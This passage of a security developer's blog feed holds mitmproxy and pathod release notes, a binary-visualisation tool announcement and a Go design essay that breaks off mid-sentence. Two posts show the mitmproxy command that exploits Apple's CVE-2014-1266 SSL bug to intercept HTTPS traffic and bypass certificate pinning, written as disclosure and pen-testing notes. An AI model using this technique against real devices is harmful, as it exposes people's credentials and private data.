To ease users into this, we've added a warning if we detect an attempt\nto select text without the right modifier key.<\/p>\n"},{"title":"mitmproxy: release v0.12 and some project news","published":"2015-05-26T00:00:00+00:00","updated":"2015-05-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_12\/","content":"<h2 id=\"project-news\">Project News<\/h2>\n<p>Before we get to the new release, I'd like to give a quick update on some\ninternal project developments.<\/p>\n<p>First up, after a somewhat involved process that included a couple of rounds of\ncommunity voting and much discussion, we have a new logo:<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy-long.png\">\n        <img src=\"mitmproxy-long.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>This will be rolled out in all the places where it makes sense along with the\n0.12 release.<\/p>\n<p>Second, the long-dormant <a rel=\"external\" href=\"http:\/\/twitter.com\/mitmproxy\">@mitmproxy<\/a> Twitter\naccount is finally waking up. Please follow us there for mitmproxy project\nupdates and related news.<\/p>\n<p>Third, we'd like to welcome <a rel=\"external\" href=\"https:\/\/github.com\/Kriechi\">Thomas Kriechbaumer<\/a>\nto the project. Thomas is being sponsored to work on mitmproxy under the\n<a rel=\"external\" href=\"https:\/\/developers.google.com\/open-source\/soc\/\">Google Summer of Code<\/a>\nprogram, and will be adding HTTP2 support - one of our most anticipated\nfeatures. Special thanks goes to the <a rel=\"external\" href=\"https:\/\/www.honeynet.org\/\">Honeynet\nProject<\/a> under whose aegis the GSoC work will be\ndone.<\/p>\n<p>Lastly, a peek into the project's immediate future. We have websockets support\non the way, thanks to a protocol contribution by <a rel=\"external\" href=\"https:\/\/github.com\/Chandler\">Chandler\nAbraham<\/a>. 
We have HTTP2 on the way, thanks to\nThomas. The mitmproxy web interface is gradually maturing behind the scenes,\nand should be ready to be unleashed on the world soon. And, of course, the\nproject continues to improve quickly in almost every other respect. It's an\nexciting time, and there's a lot of interesting work to do - if you'd like to\nbe involved, please get in touch.<\/p>\n<h2 id=\"mitmproxy-v0-12\">mitmproxy v0.12<\/h2>\n<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The most immediately visible change in v0.12 is a thorough overhaul of the\nconsole interface, which has been improved in almost every respect. Performance\nand responsiveness are better, keybindings have been consolidated, and options\nhave been collected in a dedicated options screen (shortcut \"o\"). Palettes have\nbeen overhauled entirely, with improvements to the palettes themselves, the\nability to change palettes on the fly, and support for non-transparent\n(mitmproxy sets the console background) and transparent (your emulator sets the\nconsole background) modes. The console application has also sprouted a powerful\nnew cookie editor that will make tampering with cookie names and values more\nconvenient.<\/p>\n<p>Other major features include official support for transparent mode on FreeBSD\n(thanks to <a rel=\"external\" href=\"http:\/\/github.com\/mike-pt\">Mike C<\/a>), the ability to log TLS master\nkeys for use with other tools like Wireshark, and support for creating flows from\nscratch in the console app (thanks <a rel=\"external\" href=\"https:\/\/github.com\/gato\">Marcelo Glezer<\/a>).\nA thorough overhaul of the documentation is also under way - thanks to <a rel=\"external\" href=\"https:\/\/github.com\/elitest\">Jim\nShaver<\/a> for his work there.<\/p>\n<h2 id=\"pathod-v0-12\">pathod v0.12<\/h2>\n<p>I'm also releasing pathod v0.12. 
The primary change here is the first phase of\nfull support for websockets. At the moment, this is client-only - server\nsupport will follow in the next release.<\/p>\n<p>Here's a taster - the pathoc command below initiates a websocket connection to\necho.websockets.org, then sends 10 websocket frames, each with a body of 100\nrandom bytes.<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> .\/pathoc echo.websockets.org ws:\/ wf:b@100:x10<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;&gt;<\/span><span> ws:\/<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">&lt;&lt;<\/span><span style=\"color: #032F62;\"> 200<\/span><span style=\"color: #6F42C1;\"> OK:<\/span><span style=\"color: #005CC5;\"> 225<\/span><span style=\"color: #032F62;\"> bytes<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #032F62;\">&gt;&gt; wf:b@100:ir,@1<\/span><\/span><\/code><\/pre>\n<p>The usual range of injections and stream manipulations are available, and every\naspect of the websocket frames can be manipulated in ways that creatively\nviolate the specs. See the pathod documentation for the language definition.<\/p>\n"},{"title":"binvis.io - a browser-based tool for visualising binary data","published":"2015-03-04T00:00:00+00:00","updated":"2015-03-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/binvis\/announce\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/binvis\/announce\/","content":"<p>Over the years, I've written a number of posts on this blog on the topic of\nbinary data visualisation. 
I looked at <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">using space-filling curves to understand\nthe structure of binary data<\/a>, I've\nshown how <a href=\"https:\/\/corte.si\/posts\/visualisation\/entropy\/\">entropy visualisation lets you trivially pick out compressed and\nencrypted sections<\/a>, and I've drawn\n<a href=\"https:\/\/corte.si\/posts\/visualisation\/malware\/\">pretty pictures of malware<\/a>.\nUnfortunately the tools I wrote (<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/scurve\">code here<\/a>)\nall produced static images, which made practical use a pain. You really\nneed interactivity to be able to combine visual exploration with inspection of\nthe actual underlying data, and to let you easily export interesting sections.<\/p>\n<h2 id=\"binvis-io\"><a rel=\"external\" href=\"http:\/\/binvis.io\">binvis.io<\/a><\/h2>\n<p>I recently started toying with the idea of using web technologies to build an\ninteractive visualiser of this sort. One thing led to another... and today, I'm\nhappy to announce a first draft of the idea: binvis.io.<\/p>\n<div class=\"media\">\n    <a href=\"http:&#x2F;&#x2F;binvis.io&#x2F;#&#x2F;view&#x2F;examples&#x2F;elf-Linux-ARMv7-ls.bin?colors=entropy\">\n        <img src=\"binvis.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>With binvis.io you can:<\/p>\n<ul>\n<li>Visually explore binary data<\/li>\n<li>Cluster bytes to pick out fine structural features with space-filling\ncurves<\/li>\n<li>Use the simple scan layout to navigate and select data intuitively<\/li>\n<li>Flip between a number of useful byte color mappings, including an entropy\nvisualiser that lets you pick out compressed or encrypted sections<\/li>\n<li>Export data segments for analysis<\/li>\n<\/ul>\n<h2 id=\"next-steps\">Next steps<\/h2>\n<p>Right now, Binvis is local only - that is, when you open a file, all analysis is\ndone in your browser and nothing is sent to the server. 
In the longer term, I'd\nlike to add the ability to upload, share and annotate binaries, both publicly\nand privately. There is probably a market of... oh, at least a dozen people out\nthere who would have use for an imgur-like sharing system for binaries. Fame and\nriches surely await. Of course, there are also an immense number of other\nimprovements to be made to almost every aspect of binvis, ranging from speed, to\nbetter colour schemes, to improvements in interaction and UX.<\/p>\n<p>The todo list is long, and time is short, so I'm looking for serious\ncollaborators. If you're interested, drop me a line!<\/p>\n<h2 id=\"thanks\">Thanks<\/h2>\n<p>Binvis isn't the first interactive binary visualisation tool of this sort. A few\nothers that spring to mind are\n<a rel=\"external\" href=\"https:\/\/sites.google.com\/site\/xxcantorxdustxx\/about\">..cantor.dust<\/a>,\n<a rel=\"external\" href=\"https:\/\/github.com\/joesavage\/binspect\">binspect<\/a> and\n<a rel=\"external\" href=\"https:\/\/github.com\/wapiflapi\/binglide\">binglide<\/a>. I'm trying to learn from\nthese precursors, and I'm delighted to see that they all also drew, to a greater\nor lesser extent, on my earlier work. 
Thus the eternal cycle of code rolls on.<\/p>\n<p>I'd like to particularly thank <a rel=\"external\" href=\"http:\/\/www.rumint.org\/gregconti\/\">Greg Conti<\/a>\nfor letting me re-use the name of <a rel=\"external\" href=\"https:\/\/code.google.com\/p\/binvis\/\">his own, much earlier visualisation\ntool<\/a>, for publishing a fascinating series of\n<a rel=\"external\" href=\"http:\/\/www.rumint.org\/gregconti\/publications\/taxonomy-bh.pdf\">papers<\/a> and\n<a rel=\"external\" href=\"https:\/\/vimeo.com\/15633207\">talks<\/a> on the topic, and for providing feedback\nboth on this particular incarnation of the idea as well as my earlier dabblings.<\/p>\n"},{"title":"mitmproxy 0.11.2","published":"2014-12-29T00:00:00+00:00","updated":"2014-12-29T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11_2\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just pushed <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy v0.11.2<\/a> out the door. This is\nprimarily a bugfix release, but does have one very useful new feature:\nconfiguration files. All options available through command-line flags can now be\nset persistently in config files, for all the tools - <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/config.html\">see the documentation for\nmore<\/a>. Adding this was made much easier by\n<a rel=\"external\" href=\"https:\/\/github.com\/zorro3\/ConfigArgParse\">ConfigArgParse<\/a>, one of those small\nPython project gems that you feel more people should know about. 
Check it out.<\/p>\n<p>This release also features the usual array of bugfixes and small improvements.\nIn particular, we now handle upstream servers that knock back connections\nwithout SNI better, and the onboarding app now works in the OSX binary builds.\nEveryone should update.<\/p>\n"},{"title":"mitmproxy and pathod 0.11","published":"2014-11-07T00:00:00+00:00","updated":"2014-11-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_11\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I'm happy to announce that we've just released v0.11 of both\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> and <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod<\/a>. This release\nfeatures a huge revamp of mitmproxy's internals and a long list of important\nfeatures. Pathod has much improved SSL support and fuzzing.<\/p>\n<p>Our thanks to the many testers and <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/blob\/master\/CONTRIBUTORS\">contributors<\/a> that helped get this\nout the door. 
Please lodge bug reports and feature requests\n<a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\/issues\">here<\/a>.<\/p>\n<h2 id=\"mitmproxy-changelog\">Mitmproxy Changelog<\/h2>\n<ul>\n<li>Performance improvements for mitmproxy console<\/li>\n<li>SOCKS5 proxy mode allows mitmproxy to act as a SOCKS5 proxy server<\/li>\n<li>Data streaming for response bodies exceeding a threshold\n(bradpeabody@gmail.com)<\/li>\n<li>Ignore hosts or IP addresses, forwarding both HTTP and HTTPS traffic\nuntouched<\/li>\n<li>Finer-grained control of traffic replay, including options to ignore\ncontents or parameters when matching flows (marcelo.glezer@gmail.com)<\/li>\n<li>Pass arguments to inline scripts<\/li>\n<li>Configurable size limit on HTTP request and response bodies<\/li>\n<li>Per-domain specification of interception certificates and keys (see\n--cert option)<\/li>\n<li>Certificate forwarding, relaying upstream SSL certificates verbatim (see\n--cert-forward)<\/li>\n<li>Search and highlighting for HTTP request and response bodies in\nmitmproxy console (pedro@worcel.com)<\/li>\n<li>Transparent proxy support on Windows<\/li>\n<li>Improved error messages and logging<\/li>\n<li>Support for FreeBSD in transparent mode, using pf (zbrdge@gmail.com)<\/li>\n<li>Content view mode for WBXML (davidshaw835@air-watch.com)<\/li>\n<li>Better documentation, with a new section on proxy modes<\/li>\n<li>Generic TCP proxy mode<\/li>\n<li>Countless bugfixes and other small improvements<\/li>\n<\/ul>\n<h2 id=\"pathod-changelog\">Pathod Changelog<\/h2>\n<ul>\n<li>Hugely improved SSL support, including dynamic generation of certificates\nusing the mitmproxy cacert<\/li>\n<li>pathoc -S dumps information on the remote SSL certificate chain<\/li>\n<li>Big improvements to fuzzing, including random spec selection and memoization\nto avoid repeating randomly generated patterns<\/li>\n<li>Reflected patterns, allowing you to embed a pathod server response\nspecification in a pathoc 
request, resolving both on client side. This makes\nfuzzing proxies and other intermediate systems much better.<\/li>\n<\/ul>\n"},{"title":"mitmproxy now supports #gotofail","published":"2014-03-11T00:00:00+00:00","updated":"2014-03-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/gotofail-mitmproxy\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/gotofail-mitmproxy\/","content":"<p>A few weeks ago, I posted that I had hacked up <a href=\"https:\/\/corte.si\/posts\/security\/cve-2014-1266\/\">a version of mitmproxy that\nexploited CVE-2014-1266<\/a>, giving unrestricted\naccess to nearly all HTTPS traffic on affected IOS and OSX devices. I chose not\nto release working code at the time, but a number of\n<a rel=\"external\" href=\"https:\/\/github.com\/gabrielg\/CVE-2014-1266-poc\">POCs<\/a> have been floating about\npublicly almost since the issue was first discovered. So, the time has come to\npublish - as of yesterday, <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\">mitmproxy's master\nbranch<\/a> supports #gotofail.<\/p>\n<p>To see the exploit in action, invoke mitmproxy as follows:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">mitmproxy<\/span><span style=\"color: #005CC5;\"> --ciphers=<\/span><span style=\"color: #032F62;\">&quot;DHE-RSA-AES256-SHA&quot;<\/span><span style=\"color: #005CC5;\"> --cert-forward<\/span><\/span><\/code><\/pre>\n<p>After configuring your device proxy, you should see something like this\nscreenshot, which shows off interception of miscellaneous iTunes traffic:<\/p>\n<div class=\"media\">\n    <a href=\".&#x2F;gotofail-mitmproxy.png\">\n        <img src=\".&#x2F;gotofail-mitmproxy.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Note that the client device here has no mitmproxy CA certificate installed, and\nwe get circumvention of 
certificate pinning \"for free\".<\/p>\n<p>Two new options make the magic work. The <strong>--ciphers<\/strong> option specifies which\nSSL ciphers we should expose to connecting clients. In this case, we force the\nclient to use a DHE cipher, which is required to trigger the issue. The\n<strong>--cert-forward<\/strong> option tells mitmproxy to pass upstream SSL certificates\ndown to the client unmodified. Usually we'd expect this to fail, since the\nupstream certs won't match mitmproxy's private key. In this case #gotofail\nmeans the client fails to properly execute the check, letting us pass\ncertificates through to the client verbatim as if we owned them.<\/p>\n<p>There's one additional wrinkle that mitmproxy smooths over - before we can get\nthe mismatching certificate and key to the client, OpenSSL itself has to be\ncoaxed into accepting them. The first version of my exploit involved a patch\nto OpenSSL to remove the library's own consistency check, but this is\ninconvenient. Luckily it turns out that we can <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/netlib\/blob\/master\/netlib\/certffi.py\">munge an obscure\nflag<\/a> in the\nRSA data-structures to circumvent this, which allows us to exploit #gotofail in\npure Python.<\/p>\n<p>The moment I got this exploit working, I marched upstairs and confiscated my\nwife's un-updated iPhone 5 to add it to my pool of test devices (never fear -\nit's been replaced with a nice new 5S). Devices running IOS of the right\nvintage have suddenly become the gold standard for analysis and pen testing.\nThis beautiful vulnerability lets us circumvent SSL effortlessly, completely\nsidestepping certificate pinning for all the applications I've tried, without\nany <a rel=\"external\" href=\"https:\/\/github.com\/iSECPartners\/ios-ssl-kill-switch\">cumbersome and invasive interference with the\ndevice<\/a>. 
Combine this with\nthe fact that these same devices also have an un-tethered jailbreak, and I think\nit's unlikely that we'll ever have an analysis platform this nice again. So,\nstockpile your IOS 7.0.6 devices now, and intercept all the things.<\/p>\n"},{"title":"Exploiting CVE-2014-1266 with mitmproxy","published":"2014-02-25T00:00:00+00:00","updated":"2014-02-25T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/cve-2014-1266\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/cve-2014-1266\/","content":"<p>This post is a quick recap of work I've been discussing on Twitter in the last\nfew hours. I've just finished putting together a version of\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> that takes advantage of\n<a rel=\"external\" href=\"http:\/\/support.apple.com\/kb\/HT6147\">CVE-2014-1266<\/a>, Apple's <a rel=\"external\" href=\"https:\/\/www.imperialviolet.org\/2014\/02\/22\/applebug.html\">critical SSL\/TLS\nbug<\/a>. We knew in theory\nthat the issue should give access to all SSL traffic using Apple's broken\nimplementation - I can now report that this is also true in practice.<\/p>\n<p>I've confirmed full transparent interception of HTTPS traffic on both IOS (prior\nto 7.0.6) and OSX Mavericks. Nearly all encrypted traffic, including usernames,\npasswords, and even Apple app updates can be captured.  This includes:<\/p>\n<ul>\n<li>App store and software update traffic<\/li>\n<li>iCloud data, including KeyChain enrollment and updates<\/li>\n<li>Data from the Calendar and Reminders<\/li>\n<li>Find My Mac updates<\/li>\n<li>Traffic for applications that use certificate pinning, like Twitter<\/li>\n<\/ul>\n<p>It's difficult to over-state the seriousness of this issue. With a tool like\nmitmproxy in the right position, an attacker can intercept, view and modify\nnearly all sensitive traffic. 
This extends to the software update mechanism\nitself, which uses HTTPS for deployment.<\/p>\n<p>At the time of writing, Apple still doesn't have a fix deployed for OSX. It took\nless than a day to get the patched version of mitmproxy and its supporting\nlibraries up and running. I won't be releasing my patches until well after\nApple's pending update, but it's safe to assume that this is now being exploited\nin the wild. Of course, intelligence agencies have no doubt been on top of this\nfor some time - perhaps some of the <a rel=\"external\" href=\"http:\/\/news.yahoo.com\/security-expert-calls-nbc-whiny-report-sochi-olympics-003047841.html\">inflammatory Sochi security horror\nstories<\/a>\nwere plausible after all.<\/p>\n"},{"title":"mitmproxy and pathod 0.10","published":"2014-01-29T00:00:00+00:00","updated":"2014-01-29T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_10\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce_0_10\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\">\n        <img src=\"..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just released v0.10 of both <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> and\n<a rel=\"external\" href=\"http:\/\/pathod.org\">pathod<\/a>. This is chiefly a bugfix release, with a few nice\nadditional features to sweeten the pot.<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy-webapp.png\">\n        <img src=\"mitmproxy-webapp.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Perhaps the most visible change has been a huge improvement in the recommended\nmethod for installing the mitmproxy certificates. Certs are now served straight\nfrom the web application hosted in mitmproxy, which means that in most cases\ncert installation is as simple as typing the mitmproxy URL into the device\ndriver. 
<a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/certinstall\/webapp.html\">See the docs<\/a> for\nmore.<\/p>\n<p>In other, minor news - I see that the <a rel=\"external\" href=\"https:\/\/github.com\/mitmproxy\/mitmproxy\">mitmproxy\nproject<\/a> has just passed 2000 stars on\nGitHub. Between PyPI and the files we serve from\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a>, the project has also seen nearly 100k\ndownloads in the last year (after removing obvious bots). I know, I know -\nfigures like these don't mean much, but it's still nice to see that people are\nusing and enjoying mitmproxy.<\/p>\n<h2 id=\"changelog\">Changelog<\/h2>\n<ul>\n<li>Support for multiple scripts and multiple script arguments<\/li>\n<li>Easy certificate install through the in-proxy web app, which is now\nenabled by default<\/li>\n<li><a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/features\/forwardproxy.html\">Forward proxy mode<\/a>,\nthat forwards proxy requests to an upstream HTTP server<\/li>\n<li>Reverse proxy now works with SSL<\/li>\n<li>Search within a request\/response using the \"\/\" and \"n\" shortcut keys<\/li>\n<li>A view that beautifies CSS files if cssutils is available<\/li>\n<li>Many bug fixes, documentation improvements, and more.<\/li>\n<\/ul>\n"},{"title":"How I Learned to Stop Worrying and Love Golang","published":"2013-11-21T00:00:00+00:00","updated":"2013-11-21T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/go\/golang-practicaly-beats-purity\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/go\/golang-practicaly-beats-purity\/","content":"<p>Here's a riff on Malcolm Gladwell's <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Outliers_(book)\">rule of thumb about\nmastery<\/a>: you don't really know\na programming language until you've written 10,000 lines of production-quality\ncode in it. 
Like the original this is a generalization that is undoubtedly false\nin many cases - still, it broadly matches my intuition for most languages and\nmost programmers<sup class=\"footnote-reference\"><a href=\"#3\">1<\/a><\/sup>. At the beginning of this year, I wrote <a href=\"https:\/\/corte.si\/posts\/code\/go\/go-rant\/\">a sniffy post\nabout Go<\/a> when I was about 20% of the way to knowing\nthe language by this measure. Today's post is an update from further along the\ncurve - about 80% - following a recent set of adventures that included entirely\nrewriting <a rel=\"external\" href=\"http:\/\/choir.io\">choir.io<\/a>'s core dispatcher in Go. My opinion of Go\nhas changed significantly in the meantime.  Despite my initial exasperation, I\nfound that the experience of actually writing Go was not unpleasant. The shallow\nissues became less annoying over time (perhaps just due to habituation), and the\ndeep issues turned out to be less problematic in practice than in theory. Most\nof all, though, I found Go was just a fun and productive language to work in. Go\nhas colonized more and more use cases for me, to the point where it is now\nseriously eroding my use of both Python and C.<\/p>\n<p>After my rather slow Road to Damascus experience, I noticed something odd: I\nfound it difficult to explain why Go worked so well in practice. Sure, Go has a\ntriad of really smashing ideas (interfaces, channels and goroutines), but my\nlist of warts and annoyances is long enough that it's not clear on paper that\nthe upsides outweigh the downsides. So, my experience of actually cutting code\nin Go was at odds with my rational analysis of the language, which bugged me.\nI've thought about this a lot over the last few months, and eventually came up\nwith an explanation that sounds like nonsense at first sight: Go's weaknesses\nare also its strengths. 
In particular, many design choices that seem to reduce\ncoherence and maintainability at first sight actually combine to give the\nlanguage a practical character that's very usable and compelling. Let's see if I\ncan convince you that this isn't as crazy as it sounds.<\/p>\n<h2 id=\"maps-and-magic\">Maps and magic<\/h2>\n<p>Let's pretend that we're the designers of Go, and see if we can follow the\nthinking that went into a seemingly simple part of the language - the value\nretrieval syntax for maps. We begin with the simplest possible case - direct,\nobvious, and familiar from a number of other languages:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>It would be nice if we could keep it this simple, but there's a complication -\nwhat if \"foo\" doesn't exist in the map? The fact that Go doesn't have\nexceptions limits the possibilities. We can discard some gross options out of\nhand - for instance, making this a runtime error or returning a magic value\nflagging non-existence are both pretty horrible. A more plausible route is to\npass an existence flag back as a second return value:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span>v, ok<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>So far, so logical, and if consistency were the primary goal, we would stop here.\nHowever, having two return values would make many common patterns of use\ninconvenient. You would constantly be discarding the <strong>ok<\/strong> flag in situations\nwhere it wasn't needed. 
Another repercussion is that you couldn't directly use\nthe results in an <strong>if<\/strong> clause. Instead of a clean phrasing like this (relying\non the zero value returned by default):<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>] {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/ Do something<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>... you would have to do this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">if<\/span><span> _, ok<\/span><span style=\"color: #D73A49;\"> :=<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]; ok {<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">    \/\/ Do something<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>Ugh. What we really want is to get the best of both worlds: the ease of the\nfirst signature, plus the flexibility of the second. In fact, Go does exactly\nthat, in a surprising way: it discards some basic conceptual constraints, and\nmakes the data returned by the map accessor depend on how many variables it's\nassigned to. When it's assigned to one variable, it just returns the value.\nWhen it's assigned to two variables, it also returns an existence flag.<\/p>\n<p>Compare this with Python. 
The dictionary access syntax is identical:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> =<\/span><span> mymap[<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>]<\/span><\/span><\/code><\/pre>\n<p>Python does have exceptions, so non-existence is signaled through a\n<strong>KeyError<\/strong>, and the dictionary interface includes a <strong>get<\/strong> method that\nallows the user to specify a default return when this is too cumbersome. This\nis certainly consistent on the surface, but there's also a deeper structure\nthat helps the user understand what's going on. The square bracket accessor\nsyntax is just syntactic sugar, because the call above is equivalent to this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"python\"><span class=\"giallo-l\"><span>v<\/span><span style=\"color: #D73A49;\"> =<\/span><span> mymap.<\/span><span style=\"color: #005CC5;\">__getitem__<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;foo&quot;<\/span><span>)<\/span><\/span><\/code><\/pre>\n<p>In a sense, then, the value access is just a method call. The coder can write a\ndictionary of their own that acts just like a built-in dictionary<sup class=\"footnote-reference\"><a href=\"#2\">2<\/a><\/sup>, and can\nalso build a clear mental model of what's going on underneath. Python\ndictionaries are conceptually built <em>up<\/em> from more primitive language elements,\nwhere Go maps are designed <em>down<\/em> from concrete use cases.<\/p>\n<h2 id=\"range-a-compendium-of-use-cases\">Range: a compendium of use cases<\/h2>\n<p>An even stranger beast is the <strong>range<\/strong> clause of Go's for loops. Like map\naccessors, <strong>range<\/strong> will return either one value or two, depending on the\nnumber of variables assigned to. 
What's particularly revealing about <strong>range<\/strong>\nis the way these results differ depending on the data type being ranged over.\nConsider this piece of code, for example:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"go\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">for<\/span><span> x, y<\/span><span style=\"color: #D73A49;\"> := range<\/span><span> v {<\/span><\/span>\n<span class=\"giallo-l\"><span>}<\/span><\/span><\/code><\/pre>\n<p>To figure out what this does, we need to know the type of <strong>v<\/strong>, and then\nconsult a table like this:<sup class=\"footnote-reference\"><a href=\"#1\">3<\/a><\/sup><\/p>\n<table class=\"table table-bordered\">\n    <tr>\n        <th>Range expression<\/th>\n        <th>1st Value<\/th>\n        <th>2nd Value<\/th>\n    <\/tr>\n    <tr>\n        <td>array or slice<\/td>\n        <td>index i<\/td>\n        <td>a[i]<\/td>\n    <\/tr>\n    <tr>\n        <td>map<\/td>\n        <td>key k<\/td>\n        <td>m[k]<\/td>\n    <\/tr>\n    <tr>\n        <td>string<\/td>\n        <td>index i of rune<\/td>\n        <td>rune int<\/td>\n    <\/tr>\n    <tr>\n        <td>channel<\/td>\n        <td>element<\/td>\n        <td>error<\/td>\n    <\/tr>\n<\/table>\n<p>What range does for arrays and maps seems consistent and not particularly\nsurprising. Things get slightly odd with channels. A second variable\narguably doesn't make much sense when ranging over a channel, so trying to do\nthis results in a compile-time error. Not terribly consistent, but logical.<\/p>\n<p>Weirder still is <strong>range<\/strong> over strings. When operating on a string, range\nreturns <a rel=\"external\" href=\"http:\/\/golang.org\/ref\/spec#Constants\">runes<\/a> (Unicode code points), not\nbytes. 
